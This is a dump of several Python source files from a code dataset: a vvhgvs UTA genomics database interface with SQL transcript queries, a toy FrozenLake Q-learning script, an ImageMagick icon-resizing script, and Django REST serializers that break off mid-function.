\"public_{sdlc}\".format(sdlc=sdlc)\n return vvhgvs.global_config['uta'][url_key]\n\n\ndef connect(db_url=None, pooling=vvhgvs.global_config.uta.pooling, application_name=None, mode=None, cache=None):\n \"\"\"Connect to a UTA database instance and return a UTA interface instance.\n\n :param db_url: URL for database connection\n :type db_url: string\n :param pooling: whether to use connection pooling (postgresql only)\n :type pooling: bool\n :param application_name: log application name in connection (useful for debugging; PostgreSQL only)\n :type application_name: str\n\n When called with an explicit db_url argument, that db_url is used for connecting.\n\n When called without an explicit argument, the function default is\n determined by the environment variable UTA_DB_URL if it exists, or\n vvhgvs.datainterface.uta.public_db_url otherwise.\n\n >>> hdp = connect()\n >>> hdp.schema_version()\n '1.1'\n\n The format of the db_url is driver://user:pass@host/database/schema (the same\n as that used by SQLAlchemy). Examples:\n\n A remote public postgresql database:\n postgresql://anonymous:anonymous@uta.biocommons.org/uta/uta_20170707'\n\n A local postgresql database:\n postgresql://localhost/uta_dev/uta_20170707\n\n For postgresql db_urls, pooling=True causes connect to use a\n psycopg2.pool.ThreadedConnectionPool.\n \"\"\"\n\n _logger.debug('connecting to ' + str(db_url) + '...')\n\n if db_url is None:\n db_url = _get_uta_db_url()\n\n url = _parse_url(db_url)\n if url.scheme == 'postgresql':\n conn = UTA_postgresql(url=url, pooling=pooling, application_name=application_name, mode=mode, cache=cache)\n else:\n # fell through connection scheme cases\n raise RuntimeError(\"{url.scheme} in {url} is not currently supported\".format(url=url))\n _logger.info('connected to ' + str(db_url) + '...')\n return conn\n\n\nclass UTABase(Interface):\n required_version = \"0.9\"\n version_type = 'matview_version'\n # for the id quires we need at least uta 1.1 and vvta ver 0.6+ \n # but no way to specify simply, without breaking whole set on lower ver num\n _queries = {\n \"acs_for_protein_md5\":\"select ac from seq_anno where seq_id=%s\",\n \"gene_info\":\"select * from gene where hgnc=%s\",\n \"gene_info_by_id\":\"select * from gene where hgnc_id=%s\",\n # to get alias (or prev symbol from alias column) use LIKE for\n # now. 'SIMILAR TO' tests slower, and like regex it has\n # safety issues \"= ANY (string_to_array(aliases,','))\" is the\n # same, if a little slower. 
If we split first and store as\n # array is 1/4 quicker, and does not have the problem of\n # having to repeat the input\n 'gene_info_by_alias_symbol':'''\n SELECT *\n FROM gene\n WHERE\n aliases = %s\n OR aliases LIKE %s || ',%%'\n OR aliases LIKE '%%,' || %s || ',%%'\n OR aliases LIKE '%%,' || %s\n ''',\n # TODO: reconcile tx_exons query and build_tx_cigar\n # built_tx_cigar says it expects exons in transcript order, but this is genomic order.\n \"tx_exons\":\"\"\"\n select tx_ac, alt_ac,alt_aln_method,alt_strand,ord,tx_start_i,tx_end_i,alt_start_i,alt_end_i,cigar\n from tx_exon_aln_mv where tx_ac=%s and alt_ac=%s and alt_aln_method=%s \n order by alt_start_i\n \"\"\",\n # This query should replace tx_exons in all new code, it is pre checked and should be a faster lookup vs\n # the list of results from tx_exons, at least for things like strand, the arrays are transcript order.\n # This contains extra details not used in the uta so that caching will prevent repeated lookups when \n # this data is used by variant validator.\n \"agg_exon_aln\":\"\"\"\n SELECT \n alt_strand,mapped_start,not_quite_cigar,mapped_end,\n cds_start_i, cds_end_i,\n transcript_exon_start_end,mapped_exon_start_end\n FROM full_tx_aln_w_nq_cigar_mv\n WHERE tx_ac=%s and alt_ac=%s and alt_aln_method=%s\n \"\"\",\n\n \"tx_for_gene\":\"\"\"\n select hgnc, cds_start_i, cds_end_i, tx_ac, alt_ac, alt_aln_method\n from current_valid_mapped_transcript_per_gene_mv where hgnc=%s\n \"\"\",\n \"tx_for_gene_id\":\"\"\"\n select hgnc, cds_start_i, cds_end_i, tx_ac, alt_ac, alt_aln_method\n from current_valid_mapped_transcript_per_gene_mv where hgnc_id=%s\n \"\"\",\n \"tx_for_region\":\"\"\"\n select tx_ac,alt_ac,alt_strand,alt_aln_method,start_i,end_i\n from current_valid_mapped_transcript_spans_mv \n where alt_ac=%s and alt_aln_method=%s and start_i < %s and %s <= end_i\n \"\"\",\n \"tx_limits\":\"\"\"\n SELECT ac, cds_start_i, cds_end_i, length, hgnc\n FROM transcript_lengths_mv\n WHERE ac=%s\n \"\"\",\n # compat query for old tx_identity_info will work with numeric indexing\n \"tx_identity_info\":\"\"\"\n SELECT ac as tx_ac, NULL AS alt_ac, NULL AS alt_aln_method, cds_start_i, cds_end_i, ARRAY[length] AS lengths, hgnc\n FROM transcript_lengths_mv\n WHERE ac=%s\n \"\"\",\n \"tx_info\":\"\"\"\n select hgnc, cds_start_i, cds_end_i, tx_ac, alt_ac, alt_aln_method\n from all_mapped_transcript_mv\n where tx_ac=%s and alt_ac=%s and alt_aln_method=%s\n \"\"\",\n \"tx_mapping_options\": \"\"\"\n select distinct tx_ac,alt_ac,alt_aln_method \n from tx_exon_aln_mv where tx_ac=%s and cigar is not NULL\n \"\"\",\n \"tx_seq\":\"select seq from seq S join seq_anno SA on S.seq_id=SA.seq_id where ac=%s\",\n \"tx_similar\":\"select * from tx_similarity_v where tx_ac1 = %s\",\n \"tx_to_pro\":\"select * from associated_accessions where tx_ac = %s order by pro_ac desc\",\n }\n\n def __init__(self, url, mode=None, cache=None):\n self.url = url\n self.seqfetcher = SeqFetcher()\n if mode != 'run':\n self._connect()\n super(UTABase, self).__init__(mode, cache)\n\n def __str__(self):\n return (\"{n} \").format(\n n=type(self).__name__,\n self=self,\n dv=self.data_version(),\n sv=self.schema_version(),\n sf=os.environ.get(\"HGVS_SEQREPO_DIR\", \"seqfetcher\"))\n\n def _fetchone(self, sql, *args):\n with self._get_cursor() as cur:\n cur.execute(sql, *args)\n return cur.fetchone()\n\n def _fetchall(self, sql, *args):\n with self._get_cursor() as cur:\n cur.execute(sql, *args)\n return cur.fetchall()\n\n 
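# Both helpers route through _get_cursor(), which pins the PostgreSQL\n    # search_path to the schema named in the connection URL, so the SQL text\n    # in _queries never needs to schema-qualify table names. A minimal\n    # sketch of an equivalent direct call:\n    #\n    #     with self._get_cursor() as cur:\n    #         cur.execute(self._queries['gene_info'], ['ATM'])\n    #         row = cur.fetchone()\n    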
############################################################################\n # Queries\n\n def data_version(self):\n return self.url.schema\n\n def schema_version(self):\n return self._fetchone(f\"select * from meta where key = '{self.version_type}'\")['value']\n\n def get_seq(self, ac, start_i=None, end_i=None):\n return self.seqfetcher.fetch_seq(ac, start_i, end_i)\n\n def get_acs_for_protein_seq(self, seq):\n \"\"\"\n returns a list of protein accessions for a given sequence. The\n list is guaranteed to contain at least one element with the\n MD5-based accession (MD5_01234abc...def56789) at the end of the\n list.\n \"\"\"\n md5 = seq_md5(seq)\n return [r['ac'] for r in self._fetchall(self._queries['acs_for_protein_md5'], [md5])] + ['MD5_' + md5]\n\n def get_gene_info(self, gene):\n \"\"\"\n returns basic information about the gene.\n\n :param gene: HGNC gene name\n :type gene: str\n\n # database results\n hgnc | ATM\n maploc | 11q22-q23\n descr | ataxia telangiectasia mutated\n summary | The protein encoded by this gene belongs to the PI3/PI4-kinase family. This...\n aliases | AT1,ATA,ATC,ATD,ATE,ATDC,TEL1,TELO1\n added | 2014-02-04 21:39:32.57125\n\n \"\"\"\n return self._fetchone(self._queries['gene_info'], [gene])\n #same as above but by id not symbol\n def get_gene_info_by_id(self, gene_id):\n return self._fetchone(self._queries['gene_info_by_id'], [gene_id])\n def get_gene_info_by_alias(self, gene_alias):\n return self._fetchall(\n self._queries['gene_info_by_alias_symbol'],\n [gene_alias,gene_alias,gene_alias,gene_alias]\n )\n\n def get_tx_exons(self, tx_ac, alt_ac, alt_aln_method):\n \"\"\"\n return transcript exon info for supplied accession (tx_ac, alt_ac, alt_aln_method), or None if not found\n\n :param tx_ac: transcript accession with version (e.g., 'NM_000051.3')\n :type tx_ac: str\n\n :param alt_ac: specific genomic sequence (e.g., NC_000011.4)\n :type alt_ac: str\n\n :param alt_aln_method: sequence alignment method (e.g., splign, blat)\n :type alt_aln_method: str\n\n # tx_exons = db.get_tx_exons('NM_199425.2', 'NC_000020.10', 'splign')\n # len(tx_exons)\n 3\n\n tx_exons have the following attributes::\n\n {\n 'tes_exon_set_id' : 98390\n 'aes_exon_set_id' : 298679\n 'tx_ac' : 'NM_199425.2'\n 'alt_ac' : 'NC_000020.10'\n 'alt_strand' : -1\n 'alt_aln_method' : 'splign'\n 'ord' : 2\n 'tx_exon_id' : 936834\n 'alt_exon_id' : 2999028\n 'tx_start_i' : 786\n 'tx_end_i' : 1196\n 'alt_start_i' : 25059178\n 'alt_end_i' : 25059588\n 'cigar' : '410='\n }\n\n For example:\n\n # tx_exons[0]['tx_ac']\n 'NM_199425.2'\n\n \"\"\"\n rows = self._fetchall(self._queries['tx_exons'], [tx_ac, alt_ac, alt_aln_method])\n if len(rows) == 0:\n raise HGVSDataNotAvailableError(\n \"No tx_exons for (tx_ac={tx_ac},alt_ac={alt_ac},alt_aln_method={alt_aln_method})\".format(\n tx_ac=tx_ac, alt_ac=alt_ac, alt_aln_method=alt_aln_method))\n\n # TODO: Check that end == transcript sequence length (but length N/A in current hdp)\n ex0 = 0 if (rows[0][\"alt_strand\"] == 1) else -1\n if rows[ex0][\"tx_start_i\"] != 0:\n raise HGVSDataNotAvailableError(\"Alignment is incomplete; cannot use transcript for mapping\"\n \"(tx_ac={tx_ac},alt_ac={alt_ac},alt_aln_method={alt_aln_method})\".format(\n tx_ac=tx_ac, alt_ac=alt_ac, alt_aln_method=alt_aln_method))\n return rows\n\n def get_agg_exon_aln(self, tx_ac, alt_ac, alt_aln_method):\n \"\"\"\n return transcript alignment details for supplied (tx_ac, alt_ac, alt_aln_method), or None if not found\n pre-filtered for start =0 and contiguousness \n return order = strand,cigar 
start offset, not quite cigar format alignment,mapped end pos,\n cds start,cds end,exon pos sets, exon mapping pos sets\n \"\"\"\n return self._fetchone(self._queries['agg_exon_aln'], [tx_ac, alt_ac, alt_aln_method])\n\n\n def get_tx_for_gene(self, gene):\n \"\"\"\n return transcript info records for supplied gene, in order of decreasing length\n\n :param gene: HGNC gene name\n :type gene: str\n \"\"\"\n return self._fetchall(self._queries['tx_for_gene'], [gene])\n #same as above but by id not symbol\n def get_tx_for_gene_id(self, gene_id):\n return self._fetchall(self._queries['tx_for_gene_id'], [gene_id])\n\n def get_tx_for_region(self, alt_ac, alt_aln_method, start_i, end_i):\n \"\"\"\n return transcripts that overlap given region\n\n :param str alt_ac: reference sequence (e.g., NC_000007.13)\n :param str alt_aln_method: alignment method (e.g., splign)\n :param int start_i: 5' bound of region\n :param int end_i: 3' bound of region\n \"\"\"\n return self._fetchall(self._queries['tx_for_region'], [alt_ac, alt_aln_method, start_i, end_i])\n\n def get_tx_identity_info(self, tx_ac):\n \"\"\"returns features associated with a single transcript.\n\n :param tx_ac: transcript accession with version (e.g., 'NM_199425.2')\n :type tx_ac: str\n\n # database output\n -[ RECORD 1 ]--+-------------\n tx_ac | NM_199425.2\n alt_ac | NM_199425.2\n alt_aln_method | transcript\n cds_start_i | 283\n cds_end_i | 1003\n lengths | {707,79,410}\n hgnc | VSX1\n\n \"\"\"\n rows = self._fetchall(self._queries['tx_identity_info'], [tx_ac])\n if len(rows) == 0:\n raise HGVSDataNotAvailableError(\"No transcript definition for (tx_ac={tx_ac})\".format(tx_ac=tx_ac))\n return rows[0]\n def get_tx_limits(self, tx_ac):\n \"\"\"returns gene symbol and non alignment derived transcript features associated with a single transcript.\n same as get_tx_identity_info but,\n does not generate dummy values for alt_ac and method \n does not wrap transcript length as lengths in array\n ac,cds_start_i,cds_end_i,length,hgnc\n \"\"\"\n rows = self._fetchall(self._queries['tx_limits'], [tx_ac])\n if len(rows) == 0:\n raise HGVSDataNotAvailableError(\"No transcript definition for (tx_ac={tx_ac})\".format(tx_ac=tx_ac))\n return rows[0]\n \n def get_tx_info(self, tx_ac, alt_ac, alt_aln_method):\n \"\"\"return a single transcript info for supplied accession (tx_ac, alt_ac, alt_aln_method), or None if not found\n\n :param tx_ac: transcript accession with version (e.g., 'NM_000051.3')\n :type tx_ac: str\n\n :param alt_ac: specific genomic sequence (e.g., NC_000011.4)\n :type alt_ac: str\n\n :param alt_aln_method: sequence alignment method (e.g., splign, blat)\n :type alt_aln_method: str\n\n # database output\n -[ RECORD 1 ]--+------------\n hgnc | ATM\n cds_start_i | 385\n cds_end_i | 9556\n tx_ac | NM_000051.3\n alt_ac | AC_000143.1\n alt_aln_method | splign\n\n \"\"\"\n rows = self._fetchall(self._queries['tx_info'], [tx_ac, alt_ac, alt_aln_method])\n if len(rows) == 0:\n raise HGVSDataNotAvailableError(\n \"No tx_info for (tx_ac={tx_ac},alt_ac={alt_ac},alt_aln_method={alt_aln_method})\".format(\n tx_ac=tx_ac, alt_ac=alt_ac, alt_aln_method=alt_aln_method))\n elif len(rows) == 1:\n return rows[0]\n else:\n raise HGVSError(\"Multiple ({n}) replies for tx_info(tx_ac=\"\n \"{tx_ac},alt_ac={alt_ac},alt_aln_method={alt_aln_method})\".format(\n n=len(rows), tx_ac=tx_ac, alt_ac=alt_ac, alt_aln_method=alt_aln_method))\n\n def get_tx_mapping_options(self, tx_ac):\n \"\"\"Return all transcript alignment sets for a given transcript\n accession (tx_ac); 
returns empty list if transcript does not\n        exist. Use this method to discover possible mapping options\n        supported in the database\n\n        :param tx_ac: transcript accession with version (e.g., 'NM_000051.3')\n        :type tx_ac: str\n\n        # database output\n        -[ RECORD 1 ]--+------------\n        hgnc           | ATM\n        cds_start_i    | 385\n        cds_end_i      | 9556\n        tx_ac          | NM_000051.3\n        alt_ac         | AC_000143.1\n        alt_aln_method | splign\n        -[ RECORD 2 ]--+------------\n        hgnc           | ATM\n        cds_start_i    | 385\n        cds_end_i      | 9556\n        tx_ac          | NM_000051.3\n        alt_ac         | NC_000011.9\n        alt_aln_method | blat\n\n        \"\"\"\n        rows = self._fetchall(self._queries['tx_mapping_options'], [tx_ac])\n        return rows\n\n    def get_similar_transcripts(self, tx_ac):\n        \"\"\"Return a list of transcripts that are similar to the given\n        transcript, with relevant similarity criteria.\n\n        >> sim_tx = hdp.get_similar_transcripts('NM_001285829.1')\n        >> dict(sim_tx[0])\n        { 'cds_eq': False,\n          'cds_es_fp_eq': False,\n          'es_fp_eq': True,\n          'tx_ac1': 'NM_001285829.1',\n          'tx_ac2': 'ENST00000498907' }\n\n        where:\n\n        * cds_eq means that the CDS sequences are identical\n        * es_fp_eq means that the full exon structures are identical\n          (i.e., incl. UTR)\n        * cds_es_fp_eq means that the cds-clipped portions of the exon\n          structures are identical (i.e., excluding UTR)\n        * Hint: \"es\" = \"exon set\", \"fp\" = \"fingerprint\", \"eq\" = \"equal\"\n\n        \"exon structure\" refers to the start and end coordinates on a\n        specified reference sequence. Thus, having the same exon\n        structure means that the transcripts are defined on the same\n        reference sequence and have the same exon spans on that\n        sequence.\n\n        \"\"\"\n\n        rows = self._fetchall(self._queries['tx_similar'], [tx_ac])\n        return rows\n\n    def get_pro_ac_for_tx_ac(self, tx_ac):\n        \"\"\"Return the (single) associated protein accession for a given transcript\n        accession, or None if not found.\"\"\"\n\n        rows = self._fetchall(self._queries['tx_to_pro'], [tx_ac])\n        try:\n            return rows[0]['pro_ac']\n        except IndexError:\n            return None\n\n    def get_assembly_map(self, assembly_name):\n        \"\"\"return a list of accessions for the specified assembly name (e.g., GRCh38.p5)\n\n        \"\"\"\n        return make_ac_name_map(assembly_name)\n\n\nclass UTA_postgresql(UTABase):\n    def __init__(self, url, pooling=vvhgvs.global_config.uta.pooling, application_name=None, mode=None, cache=None):\n        if url.schema is None:\n            raise Exception(\"No schema name provided in {url}\".format(url=url))\n        self.application_name = application_name\n        self.pooling = pooling\n        self._conn = None\n        super(UTA_postgresql, self).__init__(url, mode, cache)\n\n    def __del__(self):\n        self.close()\n\n    def close(self):\n        if self.pooling:\n            self._pool.closeall()\n        else:\n            if self._conn is not None:\n                self._conn.close()\n\n    def _connect(self):\n        if self.application_name is None:\n            st = inspect.stack()\n            self.application_name = os.path.basename(st[-1][1])\n        conn_args = dict(\n            host=self.url.hostname,\n            port=self.url.port,\n            database=self.url.database,\n            user=self.url.username,\n            password=self.url.password,\n            application_name=self.application_name + \"/\" + vvhgvs.__version__,\n        )\n        if self.pooling:\n            _logger.info(\"Using UTA ThreadedConnectionPool\")\n            self._pool = psycopg2.pool.ThreadedConnectionPool(vvhgvs.global_config.uta.pool_min,\n                                                              vvhgvs.global_config.uta.pool_max, **conn_args)\n        else:\n            self._conn = psycopg2.connect(**conn_args)\n            self._conn.autocommit = True\n\n        self._ensure_schema_exists()\n\n    def _ensure_schema_exists(self):\n        # N.B. 
On AWS RDS, information_schema.schemata always returns zero rows\n        r = self._fetchone(\"select exists(SELECT 1 FROM pg_namespace WHERE nspname = %s)\", [self.url.schema])\n        if r[0]:\n            return\n        raise HGVSDataNotAvailableError(\"specified schema ({}) does not exist (url={})\".format(\n            self.url.schema, self.url))\n\n    @contextlib.contextmanager\n    def _get_cursor(self, n_retries=1):\n        \"\"\"Returns a context manager for a cursor obtained from a single or pooled\n        connection, and sets the PostgreSQL search_path to the schema\n        specified in the connection URL.\n\n        Although *connections* are threadsafe, *cursors* are bound to\n        connections and are *not* threadsafe. Do not share cursors\n        across threads.\n\n        Use this function like this::\n\n            with hdp._get_cursor() as cur:\n                # your code\n\n        Do not call this function outside a contextmanager.\n\n        \"\"\"\n\n        n_tries_rem = n_retries + 1\n        while n_tries_rem > 0:\n            try:\n\n                conn = self._pool.getconn() if self.pooling else self._conn\n\n                # autocommit=True obviates closing explicitly\n                conn.autocommit = True\n\n                cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n                cur.execute(\"set search_path = {self.url.schema};\".format(self=self))\n\n                yield cur\n\n                # contextmanager executes these when context exits\n                cur.close()\n                if self.pooling:\n                    self._pool.putconn(conn)\n\n                break\n\n            except psycopg2.OperationalError:\n\n                _logger.warning(\"Lost connection to {url}; attempting reconnect\".format(url=self.url))\n                if self.pooling:\n                    self._pool.closeall()\n                self._connect()\n                _logger.warning(\"Reconnected to {url}\".format(url=self.url))\n\n                n_tries_rem -= 1\n\n        else:\n\n            # N.B. Probably never reached\n            raise HGVSError(\"Permanently lost connection to {url} ({n} retries)\".format(url=self.url, n=n_retries))\n\n\nclass ParseResult(urlparse.ParseResult):\n    \"\"\"Subclass of url.ParseResult that adds database and schema methods,\n    and provides stringification.\n\n    \"\"\"\n\n    def __new__(cls, pr):\n        return super(ParseResult, cls).__new__(cls, *pr)\n\n    @property\n    def database(self):\n        path_elems = self.path.split(\"/\")\n        return path_elems[1] if len(path_elems) > 1 else None\n\n    @property\n    def schema(self):\n        path_elems = self.path.split(\"/\")\n        return path_elems[2] if len(path_elems) > 2 else None\n\n    def __str__(self):\n        return self.geturl()\n\n\ndef _parse_url(db_url):\n    \"\"\"parse database connection urls into components\n\n    UTA database connection URLs follow that of SQLAlchemy, except\n    that a schema may be optionally specified after the database. 
The\n    skeleton format is:\n\n        driver://user:pass@host/database/schema\n\n    >>> params = _parse_url(\"driver://user:pass@host:9876/database/schema\")\n\n    >>> params.scheme\n    u'driver'\n\n    >>> params.hostname\n    u'host'\n\n    >>> params.username\n    u'user'\n\n    >>> params.password\n    u'pass'\n\n    >>> params.database\n    u'database'\n\n    >>> params.schema\n    u'schema'\n\n    \"\"\"\n\n    return ParseResult(urlparse.urlparse(db_url))\n\n\nif __name__ == \"__main__\":\n    import doctest\n    doctest.testmod()\n\n# <LICENSE>\n# Copyright 2018 HGVS Contributors (https://github.com/biocommons/hgvs)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# </LICENSE>\n","sub_path":"vvhgvs/dataproviders/uta.py","file_name":"uta.py","file_ext":"py","file_size_in_byte":25413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"104416593","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n'''\n\tpython ==> a Dummy Q-Learning implementation from Sung Kim's RL lecture\n'''\n\nimport gym\nfrom gym.envs.registration import register\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys, tty, termios\nimport random as pr\n\n#\ndef rargmax(vector):\n\t# argmax that chooses randomly among eligible maximum indices\n\tm = np.amax(vector)\n\tindices = np.nonzero(vector == m)[0]\n\treturn pr.choice(indices)\n\nregister(\n\tid='FrozenLake-v3',\n\tentry_point = 'gym.envs.toy_text:FrozenLakeEnv',\n\tkwargs={'map_name' : '4x4', 'is_slippery' : False}\n)\n\nenv = gym.make('FrozenLake-v3')\n\n# Initialize table with zeros\nQ = np.zeros([env.observation_space.n, env.action_space.n])\n\n# set learning parameters\nnum_episodes = 2000\n\n# create lists to contain total rewards and steps per episode\nrList = []\nfor i in range(num_episodes):\n\t# reset environment and get first new observation\n\tstate = env.reset()\n\trAll = 0\n\tdone = False;\n\n\t# the q-table learning algorithm\n\twhile not done:\n\t\taction = rargmax(Q[state, :])\n\t\t# get new state and reward from environment\n\t\tnew_state, reward, done, _ = env.step(action)\n\n\t\t# update q-table with new knowledge using learning rate\n\t\tQ[state,action] = reward + np.max(Q[new_state,:])\n\t\trAll += reward\n\t\tstate = new_state\n\trList.append(rAll)\n\n\nprint(\"Success rate: \" + str(sum(rList)/num_episodes))\nprint(\"Final Q-table values\")\nprint(\"LEFT DOWN RIGHT UP\")\nprint(Q)\nplt.plot(range(len(rList)), rList, 'r+', color=\"blue\")\nplt.show()\n","sub_path":"python_archive/machineLearning/sungKim_lecture/dummyQLearning.py","file_name":"dummyQLearning.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"548544786","text":"#!/usr/bin/env python3\n\n# The script uses ImageMagick's `convert` tool to resize app icons.\n\n\"\"\"\nScript receives a single argument: path to .png file.\nUsage example:\n    app_icon_resize_legacy.py image.png\n\"\"\"\n\nimport os\nfrom subprocess import call\nimport sys\n\n\nSIZES = [\n    (20, 1),\n    (20, 2),\n    (20, 3),\n    (24, 2),\n    (27.5, 2),\n    (29, 1),\n    (29, 2),\n    (29, 3),\n    (40, 1),\n    (40, 2),\n    (40, 3),\n    (44, 2),\n    (50, 1),\n    (50, 2),\n    (57, 1),\n    (57, 2),\n    (60, 2),\n    (60, 3),\n    (72, 1),\n    (72, 2),\n    (76, 1),\n    (76, 2),\n    (83.5, 2),\n    (86, 2),\n    (98, 2),\n    (108, 2),\n    (1024, 1)\n]\n\n\ndef resize(original, size, scale):\n    file_name = format_name(size, scale)\n    print(file_name)\n    side = str(int(size * scale))\n    call([\"convert\", original, \"-alpha\", \"off\",\n          \"-resize\", side + \"x\" + side, file_name])\n\n\ndef format_name(size, scale):\n    return str(size) + \"@\" + str(scale) + \"x\" + \".png\"\n\n\ndef test_format_name():\n    assert format_name(24, 2) == \"24@2x.png\"\n\n\ndef get_original_path():\n    if len(sys.argv) != 2:\n        sys.exit(__doc__)\n    original = sys.argv[1]\n    if os.path.exists(original):\n        return original\n    sys.exit(f'Path does not exist: \"{original}\".')\n\n\noriginal = get_original_path()\nfor (size, scale) in SIZES:\n    resize(original, size, scale)\n","sub_path":"deprecated-scripts/app_icon_resize_legacy.py","file_name":"app_icon_resize_legacy.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"71343767","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom accounts.models import UserProfile, User\nfrom groups.models import Group\nfrom groupchat.models import GroupMessage,GroupChat\nimport json\n\n\nclass UserSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = get_user_model()\n        fields = ['id', 'last_login', 'email', 'is_active', 'is_staff']  # '__all__'\n        read_only_fields = ['id', 'last_login', 'email', 'is_active', 'is_staff']\n\n\nclass UserAdminSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = get_user_model()\n        fields = '__all__'\n\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = UserProfile\n        fields = ['user', 'url', 'profile_image', 'fake_count']  # '__all__'\n        read_only_fields = ['user', 'fake_count']\n\n    def update(self, instance, validated_data):\n        instance.profile_image = validated_data.get('profile_image', instance.profile_image)\n        instance.save()\n        return instance\n\n\nclass UserPublicProfileSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = UserProfile\n        fields = ['url', 'profile_image']  # '__all__'\n        read_only_fields = ['url', 'profile_image']\n\n\nclass UserAdminProfileSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = UserProfile\n        fields = '__all__'\n\n    def update(self, instance, validated_data):\n        instance.profile_image = validated_data.get('profile_image', instance.profile_image)\n        instance.save()\n        return instance\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Group\n        fields = ['id', 'owner', 'parents', 'children', 'name', 'uri', 'children_uri_field', 'description',\n                  'group_image', 'group_banner']\n        read_only_fields = ['id', 'owner', 'parents', 'children', 'name', 'uri', 'children_uri_field', 'description',\n                            'group_image', 'group_banner']\n\n    children_uri_field = serializers.SerializerMethodField('children_uri')\n\n    def children_uri(self, group):\n        _group = Group.objects.get(uri=group)\n        children = []\n        for child in _group.children.all():\n            children.append(child.uri)\n        return children\n\n\nclass GroupChatSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = GroupChat\n        fields = ['id', 'type', 'name', 'group', 'group_messages']\n\n    group_messages = serializers.SerializerMethodField('group_message')\n\n    def 
2),\n (29, 1),\n (29, 2),\n (29, 3),\n (40, 1),\n (40, 2),\n (40, 3),\n (44, 2),\n (50, 1),\n (50, 2),\n (57, 1),\n (57, 2),\n (60, 2),\n (60, 3),\n (72, 1),\n (72, 2),\n (76, 1),\n (76, 2),\n (83.5, 2),\n (86, 2),\n (98, 2),\n (108, 2),\n (1024, 1)\n]\n\n\ndef resize(original, size, scale):\n file_name = format_name(size, scale)\n print(file_name)\n side = str(int(size * scale))\n call([\"convert\", original, \"-alpha\", \"off\",\n \"-resize\", side + \"x\" + side, file_name])\n\n\ndef format_name(size, scale):\n return str(size) + \"@\" + str(scale) + \"x\" + \".png\"\n\n\ndef test_format_name():\n assert format_name(24, 2) == \"24@2x.png\"\n\n\ndef get_original_path():\n if len(sys.argv) != 2:\n sys.exit(__doc__)\n original = sys.argv[1]\n if os.path.exists(original):\n return original\n sys.exit(f'Path does not exist: \"{original}\".')\n\n\noriginal = get_original_path()\nfor (size, scale) in SIZES:\n resize(original, size, scale)\n","sub_path":"deprecated-scripts/app_icon_resize_legacy.py","file_name":"app_icon_resize_legacy.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"71343767","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom accounts.models import UserProfile, User\nfrom groups.models import Group\nfrom groupchat.models import GroupMessage,GroupChat\nimport json\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_user_model()\n fields = ['id', 'last_login', 'email', 'is_active', 'is_staff'] # '__all__'\n read_only_fields = ['id', 'last_login', 'email', 'is_active', 'is_staff']\n\n\nclass UserAdminSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_user_model()\n fields = '__all__'\n\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserProfile\n fields = ['user', 'url', 'profile_image', 'fake_count'] # '__all__'\n read_only_fields = ['user', 'fake_count']\n\n def update(self, instance, validated_data):\n instance.profile_image = validated_data.get('profile_image', instance.profile_image)\n instance.save()\n return instance\n\n\nclass UserPublicProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserProfile\n fields = ['url', 'profile_image'] # '__all__'\n read_only_fields = ['url', 'profile_image']\n\n\nclass UserAdminProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserProfile\n fields = '__all__'\n\n def update(self, instance, validated_data):\n instance.profile_image = validated_data.get('profile_image', instance.profile_image)\n instance.save()\n return instance\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = ['id', 'owner', 'parents', 'children', 'name', 'uri', 'children_uri_field', 'description',\n 'group_image', 'group_banner']\n read_only_fields = ['id', 'owner', 'parents', 'children', 'name', 'uri', 'children_uri_field', 'description',\n 'group_image', 'group_banner']\n\n children_uri_field = serializers.SerializerMethodField('children_uri')\n\n def children_uri(self, group):\n _group = Group.objects.get(uri=group)\n children = []\n for child in _group.children.all():\n children.append(child.uri)\n return children\n\n\nclass GroupChatSerializer(serializers.ModelSerializer):\n class Meta:\n model = GroupChat\n fields = ['id', 'type', 'name', 'group', 'group_messages']\n\n group_messages = serializers.SerializerMethodField('group_message')\n\n def 
